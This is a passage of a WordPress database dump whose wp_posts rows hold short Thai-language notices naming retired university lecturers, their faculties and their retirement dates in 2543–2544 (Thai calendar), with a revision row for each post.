(163, 1, '2019-05-26 14:57:36', '2019-05-26 07:57:36', 'รองศาสตราจารย์โกมล  บัวเผียน\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2543', 'รองศาสตราจารย์โกมล  บัวเผียน', '', 'publish', 'closed', 'open', '', '%e0%b8%a3%e0%b8%ad%e0%b8%87%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b9%82%e0%b8%81%e0%b8%a1%e0%b8%a5-%e0%b8%9a%e0%b8%b1%e0%b8%a7', '', '', '2019-05-26 14:57:36', '2019-05-26 07:57:36', '', 0, 'http://172.17.40.11/wp511/?p=163', 0, 'post', '', 0),
(164, 1, '2019-05-26 14:57:36', '2019-05-26 07:57:36', 'รองศาสตราจารย์โกมล  บัวเผียน\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2543', 'รองศาสตราจารย์โกมล  บัวเผียน', '', 'inherit', 'closed', 'closed', '', '163-revision-v1', '', '', '2019-05-26 14:57:36', '2019-05-26 07:57:36', '', 163, 'http://172.17.40.11/wp511/?p=164', 0, 'revision', '', 0),
(165, 1, '2019-05-26 14:57:50', '2019-05-26 07:57:50', 'อาจารย์ประดับ  พงศ์ไพบูลย์\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2543', 'อาจารย์ประดับ  พงศ์ไพบูลย์', '', 'publish', 'closed', 'open', '', '%e0%b8%ad%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%94%e0%b8%b1%e0%b8%9a-%e0%b8%9e%e0%b8%87%e0%b8%a8%e0%b9%8c%e0%b9%84%e0%b8%9e%e0%b8%9a%e0%b8%b9', '', '', '2019-05-26 14:57:50', '2019-05-26 07:57:50', '', 0, 'http://172.17.40.11/wp511/?p=165', 0, 'post', '', 0),
(166, 1, '2019-05-26 14:57:50', '2019-05-26 07:57:50', 'อาจารย์ประดับ  พงศ์ไพบูลย์\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2543', 'อาจารย์ประดับ  พงศ์ไพบูลย์', '', 'inherit', 'closed', 'closed', '', '165-revision-v1', '', '', '2019-05-26 14:57:50', '2019-05-26 07:57:50', '', 165, 'http://172.17.40.11/wp511/?p=166', 0, 'revision', '', 0),
(167, 1, '2019-05-26 14:58:04', '2019-05-26 07:58:04', 'อาจารย์เสน่ห์  สววิบูลย์\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2543', 'อาจารย์เสน่ห์  สววิบูลย์', '', 'publish', 'closed', 'open', '', '%e0%b8%ad%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b9%80%e0%b8%aa%e0%b8%99%e0%b9%88%e0%b8%ab%e0%b9%8c-%e0%b8%aa%e0%b8%a7%e0%b8%a7%e0%b8%b4%e0%b8%9a%e0%b8%b9%e0%b8%a5%e0%b8%a2', '', '', '2019-05-26 14:58:04', '2019-05-26 07:58:04', '', 0, 'http://172.17.40.11/wp511/?p=167', 0, 'post', '', 0),
(168, 1, '2019-05-26 14:58:04', '2019-05-26 07:58:04', 'อาจารย์เสน่ห์  สววิบูลย์\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2543', 'อาจารย์เสน่ห์  สววิบูลย์', '', 'inherit', 'closed', 'closed', '', '167-revision-v1', '', '', '2019-05-26 14:58:04', '2019-05-26 07:58:04', '', 167, 'http://172.17.40.11/wp511/?p=168', 0, 'revision', '', 0),
(169, 1, '2019-05-26 14:58:19', '2019-05-26 07:58:19', 'อาจารย์นุกูล  สุภาวุฒิ\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2543', 'อาจารย์นุกูล  สุภาวุฒิ', '', 'publish', 'closed', 'open', '', '%e0%b8%ad%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%99%e0%b8%b8%e0%b8%81%e0%b8%b9%e0%b8%a5-%e0%b8%aa%e0%b8%b8%e0%b8%a0%e0%b8%b2%e0%b8%a7%e0%b8%b8%e0%b8%92%e0%b8%b4', '', '', '2019-05-26 14:58:19', '2019-05-26 07:58:19', '', 0, 'http://172.17.40.11/wp511/?p=169', 0, 'post', '', 0),
(170, 1, '2019-05-26 14:58:19', '2019-05-26 07:58:19', 'อาจารย์นุกูล  สุภาวุฒิ\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2543', 'อาจารย์นุกูล  สุภาวุฒิ', '', 'inherit', 'closed', 'closed', '', '169-revision-v1', '', '', '2019-05-26 14:58:19', '2019-05-26 07:58:19', '', 169, 'http://172.17.40.11/wp511/?p=170', 0, 'revision', '', 0),
(171, 1, '2019-05-26 14:58:35', '2019-05-26 07:58:35', 'ผู้ช่วยศาสตราจารย์สดใส  ขันติวรพงศ์\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2543', 'ผู้ช่วยศาสตราจารย์สดใส  ขันติวรพงศ์', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%aa%e0%b8%94%e0%b9%83%e0%b8%aa', '', '', '2019-05-26 14:58:35', '2019-05-26 07:58:35', '', 0, 'http://172.17.40.11/wp511/?p=171', 0, 'post', '', 0),
(172, 1, '2019-05-26 14:58:35', '2019-05-26 07:58:35', 'ผู้ช่วยศาสตราจารย์สดใส  ขันติวรพงศ์\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2543', 'ผู้ช่วยศาสตราจารย์สดใส  ขันติวรพงศ์', '', 'inherit', 'closed', 'closed', '', '171-revision-v1', '', '', '2019-05-26 14:58:35', '2019-05-26 07:58:35', '', 171, 'http://172.17.40.11/wp511/?p=172', 0, 'revision', '', 0),
(173, 1, '2019-05-26 14:58:51', '2019-05-26 07:58:51', 'ผู้ช่วยศาสตราจารย์เปลื้อง  แก้วอุบล\r\n\r\nสังกัด  คณะวิทยาการจัดการ\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2543', 'ผู้ช่วยศาสตราจารย์เปลื้อง  แก้วอุบล', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b9%80%e0%b8%9b%e0%b8%a5%e0%b8%b7', '', '', '2019-05-26 14:58:51', '2019-05-26 07:58:51', '', 0, 'http://172.17.40.11/wp511/?p=173', 0, 'post', '', 0),
(174, 1, '2019-05-26 14:58:51', '2019-05-26 07:58:51', 'ผู้ช่วยศาสตราจารย์เปลื้อง  แก้วอุบล\r\n\r\nสังกัด  คณะวิทยาการจัดการ\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2543', 'ผู้ช่วยศาสตราจารย์เปลื้อง  แก้วอุบล', '', 'inherit', 'closed', 'closed', '', '173-revision-v1', '', '', '2019-05-26 14:58:51', '2019-05-26 07:58:51', '', 173, 'http://172.17.40.11/wp511/?p=174', 0, 'revision', '', 0),
(175, 1, '2019-05-26 14:59:03', '2019-05-26 07:59:03', 'อาจารย์ไพรัช  ชุมนุมพันธ์\r\n\r\nสังกัด  คณะวิทยาศาสตร์และเทคโนโลยี\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2543', 'อาจารย์ไพรัช  ชุมนุมพันธ์', '', 'publish', 'closed', 'open', '', '%e0%b8%ad%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b9%84%e0%b8%9e%e0%b8%a3%e0%b8%b1%e0%b8%8a-%e0%b8%8a%e0%b8%b8%e0%b8%a1%e0%b8%99%e0%b8%b8%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99', '', '', '2019-05-26 14:59:03', '2019-05-26 07:59:03', '', 0, 'http://172.17.40.11/wp511/?p=175', 0, 'post', '', 0),
(176, 1, '2019-05-26 14:59:03', '2019-05-26 07:59:03', 'อาจารย์ไพรัช  ชุมนุมพันธ์\r\n\r\nสังกัด  คณะวิทยาศาสตร์และเทคโนโลยี\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2543', 'อาจารย์ไพรัช  ชุมนุมพันธ์', '', 'inherit', 'closed', 'closed', '', '175-revision-v1', '', '', '2019-05-26 14:59:03', '2019-05-26 07:59:03', '', 175, 'http://172.17.40.11/wp511/?p=176', 0, 'revision', '', 0),
(177, 1, '2019-05-26 14:59:17', '2019-05-26 07:59:17', 'อาจารย์อาภา  ศรียะพันธ์\r\n\r\nสังกัด  คณะศิลปกรรมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2543', 'อาจารย์อาภา  ศรียะพันธ์', '', 'publish', 'closed', 'open', '', '%e0%b8%ad%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%ad%e0%b8%b2%e0%b8%a0%e0%b8%b2-%e0%b8%a8%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%b0%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c', '', '', '2019-05-26 14:59:17', '2019-05-26 07:59:17', '', 0, 'http://172.17.40.11/wp511/?p=177', 0, 'post', '', 0),
(178, 1, '2019-05-26 14:59:17', '2019-05-26 07:59:17', 'อาจารย์อาภา  ศรียะพันธ์\r\n\r\nสังกัด  คณะศิลปกรรมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2543', 'อาจารย์อาภา  ศรียะพันธ์', '', 'inherit', 'closed', 'closed', '', '177-revision-v1', '', '', '2019-05-26 14:59:17', '2019-05-26 07:59:17', '', 177, 'http://172.17.40.11/wp511/?p=178', 0, 'revision', '', 0),
(179, 1, '2019-05-26 14:59:30', '2019-05-26 07:59:30', 'อาจารย์ควน  ทวนยก\r\n\r\nสังกัด  คณะศิลปกรรมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2543', 'อาจารย์ควน  ทวนยก', '', 'publish', 'closed', 'open', '', '%e0%b8%ad%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%84%e0%b8%a7%e0%b8%99-%e0%b8%97%e0%b8%a7%e0%b8%99%e0%b8%a2%e0%b8%81', '', '', '2019-05-26 14:59:30', '2019-05-26 07:59:30', '', 0, 'http://172.17.40.11/wp511/?p=179', 0, 'post', '', 0),
(180, 1, '2019-05-26 14:59:30', '2019-05-26 07:59:30', 'อาจารย์ควน  ทวนยก\r\n\r\nสังกัด  คณะศิลปกรรมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2543', 'อาจารย์ควน  ทวนยก', '', 'inherit', 'closed', 'closed', '', '179-revision-v1', '', '', '2019-05-26 14:59:30', '2019-05-26 07:59:30', '', 179, 'http://172.17.40.11/wp511/?p=180', 0, 'revision', '', 0),
(181, 1, '2019-05-26 14:59:43', '2019-05-26 07:59:43', 'ผู้ช่วยศาสตราจารย์ทรงวุฒิ  สุวรรณโณ\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2544', 'ผู้ช่วยศาสตราจารย์ทรงวุฒิ  สุวรรณโณ', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%97%e0%b8%a3%e0%b8%87%e0%b8%a7', '', '', '2019-05-26 14:59:43', '2019-05-26 07:59:43', '', 0, 'http://172.17.40.11/wp511/?p=181', 0, 'post', '', 0),
(182, 1, '2019-05-26 14:59:43', '2019-05-26 07:59:43', 'ผู้ช่วยศาสตราจารย์ทรงวุฒิ  สุวรรณโณ\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2544', 'ผู้ช่วยศาสตราจารย์ทรงวุฒิ  สุวรรณโณ', '', 'inherit', 'closed', 'closed', '', '181-revision-v1', '', '', '2019-05-26 14:59:43', '2019-05-26 07:59:43', '', 181, 'http://172.17.40.11/wp511/?p=182', 0, 'revision', '', 0),
(183, 1, '2019-05-26 14:59:55', '2019-05-26 07:59:55', 'ผู้ช่วยศาสตราจารย์เสถียร  ศิริสถิตย์กุล\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2544', 'ผู้ช่วยศาสตราจารย์เสถียร  ศิริสถิตย์กุล', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b9%80%e0%b8%aa%e0%b8%96%e0%b8%b5-2', '', '', '2019-05-26 14:59:55', '2019-05-26 07:59:55', '', 0, 'http://172.17.40.11/wp511/?p=183', 0, 'post', '', 0),
(184, 1, '2019-05-26 14:59:55', '2019-05-26 07:59:55', 'ผู้ช่วยศาสตราจารย์เสถียร  ศิริสถิตย์กุล\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2544', 'ผู้ช่วยศาสตราจารย์เสถียร  ศิริสถิตย์กุล', '', 'inherit', 'closed', 'closed', '', '183-revision-v1', '', '', '2019-05-26 14:59:55', '2019-05-26 07:59:55', '', 183, 'http://172.17.40.11/wp511/?p=184', 0, 'revision', '', 0),
(185, 1, '2019-05-26 15:00:07', '2019-05-26 08:00:07', 'รองศาสตราจารย์ดร.นงนุช  กุลบุญ\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2544', 'รองศาสตราจารย์ดร.นงนุช  กุลบุญ', '', 'publish', 'closed', 'open', '', '%e0%b8%a3%e0%b8%ad%e0%b8%87%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%94%e0%b8%a3-%e0%b8%99%e0%b8%87%e0%b8%99%e0%b8%b8%e0%b8%8a', '', '', '2019-05-26 15:00:07', '2019-05-26 08:00:07', '', 0, 'http://172.17.40.11/wp511/?p=185', 0, 'post', '', 0),
(186, 1, '2019-05-26 15:00:07', '2019-05-26 08:00:07', 'รองศาสตราจารย์ดร.นงนุช  กุลบุญ\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2544', 'รองศาสตราจารย์ดร.นงนุช  กุลบุญ', '', 'inherit', 'closed', 'closed', '', '185-revision-v1', '', '', '2019-05-26 15:00:07', '2019-05-26 08:00:07', '', 185, 'http://172.17.40.11/wp511/?p=186', 0, 'revision', '', 0),
(187, 1, '2019-05-26 15:00:20', '2019-05-26 08:00:20', 'อาจารย์จันทนา  วรรณกูล\r\n\r\nสังกัด  คณะครุศาสตร์\r\n\r\nเข้าร่วมโครงการเปลี่ยนเส้นทางชีวิต  เกษียณอายุราชการ  วันที่ 30 กันยายน 2544', 'อาจารย์จันทนา  วรรณกูล', '', 'publish', 'closed', 'open', '', '%e0%b8%ad%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%88%e0%b8%b1%e0%b8%99%e0%b8%97%e0%b8%99%e0%b8%b2-%e0%b8%a7%e0%b8%a3%e0%b8%a3%e0%b8%93%e0%b8%81%e0%b8%b9%e0%b8%a5', '', '', '2019-05-26 15:00:20', '2019-05-26 08:00:20', '', 0, 'http://172.17.40.11/wp511/?p=187', 0, 'post', '', 0),
(188, 1, '2019-05-26 15:00:20', '2019-05-26 08:00:20', 'อาจารย์จันทนา  วรรณกูล\r\n\r\nสังกัด  คณะครุศาสตร์\r\n\r\nเข้าร่วมโครงการเปลี่ยนเส้นทางชีวิต  เกษียณอายุราชการ  วันที่ 30 กันยายน 2544', 'อาจารย์จันทนา  วรรณกูล', '', 'inherit', 'closed', 'closed', '', '187-revision-v1', '', '', '2019-05-26 15:00:20', '2019-05-26 08:00:20', '', 187, 'http://172.17.40.11/wp511/?p=188', 0, 'revision', '', 0),
(189, 1, '2019-05-26 15:00:33', '2019-05-26 08:00:33', 'ผู้ช่วยศาสตราจารย์ดวงเดือน  แจ้งสว่าง\r\n\r\nสังกัด  คณะครุศาสตร์\r\n\r\nเข้าร่วมโครงการเปลี่ยนเส้นทางชีวิต  เกษียณอายุราชการ  วันที่ 30 กันยายน 2544', 'ผู้ช่วยศาสตราจารย์ดวงเดือน  แจ้งสว่าง', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%94%e0%b8%a7%e0%b8%87%e0%b9%80', '', '', '2019-05-26 15:00:33', '2019-05-26 08:00:33', '', 0, 'http://172.17.40.11/wp511/?p=189', 0, 'post', '', 0),
(190, 1, '2019-05-26 15:00:33', '2019-05-26 08:00:33', 'ผู้ช่วยศาสตราจารย์ดวงเดือน  แจ้งสว่าง\r\n\r\nสังกัด  คณะครุศาสตร์\r\n\r\nเข้าร่วมโครงการเปลี่ยนเส้นทางชีวิต  เกษียณอายุราชการ  วันที่ 30 กันยายน 2544', 'ผู้ช่วยศาสตราจารย์ดวงเดือน  แจ้งสว่าง', '', 'inherit', 'closed', 'closed', '', '189-revision-v1', '', '', '2019-05-26 15:00:33', '2019-05-26 08:00:33', '', 189, 'http://172.17.40.11/wp511/?p=190', 0, 'revision', '', 0),
(191, 1, '2019-05-26 15:00:55', '2019-05-26 08:00:55', 'ผู้ช่วยศาสตราจารย์วันเพ็ญ  คณาวุฒิ\r\n\r\nสังกัด  คณะครุศาสตร์\r\n\r\nเข้าร่วมโครงการเปลี่ยนเส้นทางชีวิต  เกษียณอายุราชการ  วันที่ 30 กันยายน 2544', 'ผู้ช่วยศาสตราจารย์วันเพ็ญ  คณาวุฒิ', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b9%80', '', '', '2019-05-26 15:00:55', '2019-05-26 08:00:55', '', 0, 'http://172.17.40.11/wp511/?p=191', 0, 'post', '', 0),
(192, 1, '2019-05-26 15:00:55', '2019-05-26 08:00:55', 'ผู้ช่วยศาสตราจารย์วันเพ็ญ  คณาวุฒิ\r\n\r\nสังกัด  คณะครุศาสตร์\r\n\r\nเข้าร่วมโครงการเปลี่ยนเส้นทางชีวิต  เกษียณอายุราชการ  วันที่ 30 กันยายน 2544', 'ผู้ช่วยศาสตราจารย์วันเพ็ญ  คณาวุฒิ', '', 'inherit', 'closed', 'closed', '', '191-revision-v1', '', '', '2019-05-26 15:00:55', '2019-05-26 08:00:55', '', 191, 'http://172.17.40.11/wp511/?p=192', 0, 'revision', '', 0),
(193, 1, '2019-05-26 15:01:08', '2019-05-26 08:01:08', 'ผู้ช่วยศาสตราจารย์เสาวภา  คุปตภากร\r\n\r\nสังกัด  คณะเทคโนโลยีการเกษตร\r\n\r\nเข้าร่วมโครงการเปลี่ยนเส้นทางชีวิต  เกษียณอายุราชการ  วันที่ 30 กันยายน 2544', 'ผู้ช่วยศาสตราจารย์เสาวภา  คุปตภากร', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b9%80%e0%b8%aa%e0%b8%b2%e0%b8%a7', '', '', '2019-05-26 15:01:08', '2019-05-26 08:01:08', '', 0, 'http://172.17.40.11/wp511/?p=193', 0, 'post', '', 0),
(194, 1, '2019-05-26 15:01:08', '2019-05-26 08:01:08', 'ผู้ช่วยศาสตราจารย์เสาวภา  คุปตภากร\r\n\r\nสังกัด  คณะเทคโนโลยีการเกษตร\r\n\r\nเข้าร่วมโครงการเปลี่ยนเส้นทางชีวิต  เกษียณอายุราชการ  วันที่ 30 กันยายน 2544', 'ผู้ช่วยศาสตราจารย์เสาวภา  คุปตภากร', '', 'inherit', 'closed', 'closed', '', '193-revision-v1', '', '', '2019-05-26 15:01:08', '2019-05-26 08:01:08', '', 193, 'http://172.17.40.11/wp511/?p=194', 0, 'revision', '', 0),
(195, 1, '2019-05-26 15:01:22', '2019-05-26 08:01:22', 'อาจารย์นงค์อร  ขนาบแก้ว\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเข้าร่วมโครงการเปลี่ยนเส้นทางชีวิต  เกาียณอายุราชการ  วันที่ 30 กันยายน 2544', 'อาจารย์นงค์อร  ขนาบแก้ว', '', 'publish', 'closed', 'open', '', '%e0%b8%ad%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%99%e0%b8%87%e0%b8%84%e0%b9%8c%e0%b8%ad%e0%b8%a3-%e0%b8%82%e0%b8%99%e0%b8%b2%e0%b8%9a%e0%b9%81%e0%b8%81%e0%b9%89%e0%b8%a7', '', '', '2019-05-26 15:01:22', '2019-05-26 08:01:22', '', 0, 'http://172.17.40.11/wp511/?p=195', 0, 'post', '', 0),
(196, 1, '2019-05-26 15:01:22', '2019-05-26 08:01:22', 'อาจารย์นงค์อร  ขนาบแก้ว\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเข้าร่วมโครงการเปลี่ยนเส้นทางชีวิต  เกาียณอายุราชการ  วันที่ 30 กันยายน 2544', 'อาจารย์นงค์อร  ขนาบแก้ว', '', 'inherit', 'closed', 'closed', '', '195-revision-v1', '', '', '2019-05-26 15:01:22', '2019-05-26 08:01:22', '', 195, 'http://172.17.40.11/wp511/?p=196', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(197, 1, '2019-05-26 15:01:34', '2019-05-26 08:01:34', 'อาจารย์ประวัติ  เส้งขาว\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเข้าร่วมโครงการเปลี่ยนเส้นทางชีวิต  เกษียณอายุราชการ  วันที่ 30 กันยายน 2544', 'อาจารย์ประวัติ  เส้งขาว', '', 'publish', 'closed', 'open', '', '%e0%b8%ad%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%a7%e0%b8%b1%e0%b8%95%e0%b8%b4-%e0%b9%80%e0%b8%aa%e0%b9%89%e0%b8%87%e0%b8%82%e0%b8%b2%e0%b8%a7', '', '', '2019-05-26 15:01:34', '2019-05-26 08:01:34', '', 0, 'http://172.17.40.11/wp511/?p=197', 0, 'post', '', 0),
(198, 1, '2019-05-26 15:01:34', '2019-05-26 08:01:34', 'อาจารย์ประวัติ  เส้งขาว\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเข้าร่วมโครงการเปลี่ยนเส้นทางชีวิต  เกษียณอายุราชการ  วันที่ 30 กันยายน 2544', 'อาจารย์ประวัติ  เส้งขาว', '', 'inherit', 'closed', 'closed', '', '197-revision-v1', '', '', '2019-05-26 15:01:34', '2019-05-26 08:01:34', '', 197, 'http://172.17.40.11/wp511/?p=198', 0, 'revision', '', 0),
(199, 1, '2019-05-26 15:01:47', '2019-05-26 08:01:47', 'อาจารย์ไพพรรณ  รัตรสาร\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเข้าร่วมโครงการเปลี่ยนเส้นทางชีวิต  เกษียณอายุราชการ  วันที่ 30 กันยายน 2544', 'อาจารย์ไพพรรณ  รัตรสาร', '', 'publish', 'closed', 'open', '', '%e0%b8%ad%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b9%84%e0%b8%9e%e0%b8%9e%e0%b8%a3%e0%b8%a3%e0%b8%93-%e0%b8%a3%e0%b8%b1%e0%b8%95%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3', '', '', '2019-05-26 15:01:47', '2019-05-26 08:01:47', '', 0, 'http://172.17.40.11/wp511/?p=199', 0, 'post', '', 0),
(200, 1, '2019-05-26 15:01:47', '2019-05-26 08:01:47', 'อาจารย์ไพพรรณ  รัตรสาร\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเข้าร่วมโครงการเปลี่ยนเส้นทางชีวิต  เกษียณอายุราชการ  วันที่ 30 กันยายน 2544', 'อาจารย์ไพพรรณ  รัตรสาร', '', 'inherit', 'closed', 'closed', '', '199-revision-v1', '', '', '2019-05-26 15:01:47', '2019-05-26 08:01:47', '', 199, 'http://172.17.40.11/wp511/?p=200', 0, 'revision', '', 0),
(201, 1, '2019-05-26 15:02:01', '2019-05-26 08:02:01', 'ผู้ช่วยศาสตราจารย์กรพินธุ์  สุรัสวดี\r\n\r\nสังกัด  คณะวิทยาศาสตร์และเทคโนโลยี\r\n\r\nเข้าร่วมโครงการเปลี่ยนเส้นทางชีวิต  เกษียณอายุราชการ  วันที่ 30 กันยายน 2544', 'ผู้ช่วยศาสตราจารย์กรพินธุ์  สุรัสวดี', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%81%e0%b8%a3%e0%b8%9e%e0%b8%b4', '', '', '2019-05-26 15:02:01', '2019-05-26 08:02:01', '', 0, 'http://172.17.40.11/wp511/?p=201', 0, 'post', '', 0),
(202, 1, '2019-05-26 15:02:01', '2019-05-26 08:02:01', 'ผู้ช่วยศาสตราจารย์กรพินธุ์  สุรัสวดี\r\n\r\nสังกัด  คณะวิทยาศาสตร์และเทคโนโลยี\r\n\r\nเข้าร่วมโครงการเปลี่ยนเส้นทางชีวิต  เกษียณอายุราชการ  วันที่ 30 กันยายน 2544', 'ผู้ช่วยศาสตราจารย์กรพินธุ์  สุรัสวดี', '', 'inherit', 'closed', 'closed', '', '201-revision-v1', '', '', '2019-05-26 15:02:01', '2019-05-26 08:02:01', '', 201, 'http://172.17.40.11/wp511/?p=202', 0, 'revision', '', 0),
